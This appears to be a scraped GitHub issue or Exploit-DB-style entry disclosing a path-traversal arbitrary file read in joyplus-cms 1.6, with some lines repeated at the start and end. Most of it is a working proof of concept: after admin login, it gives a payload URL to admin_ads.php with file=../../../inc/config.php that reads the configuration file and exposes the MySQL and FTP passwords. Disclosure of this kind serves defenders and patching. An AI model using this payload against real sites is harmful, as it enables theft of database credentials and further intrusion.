You can switch to any directory ex:file=../../../inc/config.php
3 read the "\joyplus-cms\inc\config.php" code Let the cat out of the mysql password
You can switch to any directory,just change the file=../../../xx.xx
The text was updated successfully, but these errors were encountered:
Title: joyplus-cms 1.6 - Any file to read vulnerability
Date: 2020-02-25
Exploit Author: Zeo
Vendor Homepage: https://github.com/joyplus/joyplus-cms and http://www.joyplus.tv
Software Link: https://github.com/joyplus/joyplus-cms
Version: 1.6
Tested on Windows 7
joyplus-cms 1.6 has a vulnerability that can Any file to read
that would allow an attacker to Sensitive information website and mysql or ftp password
Proof :
1 Normal installation site and login
http://127.0.0.1/joyplus-cms/manager/index.php?action=login
2 Access to trigger the vulnerability site You can switch to any directory
payload
http://127.0.0.1/joyplus-cms/manager/admin_ads.php?action=edit&file=../../../inc/config.php
You can switch to any directory ex:file=../../../inc/config.php
3 read the "\joyplus-cms\inc\config.php" code Let the cat out of the mysql password
You can switch to any directory,just change the file=../../../xx.xx
The text was updated successfully, but these errors were encountered: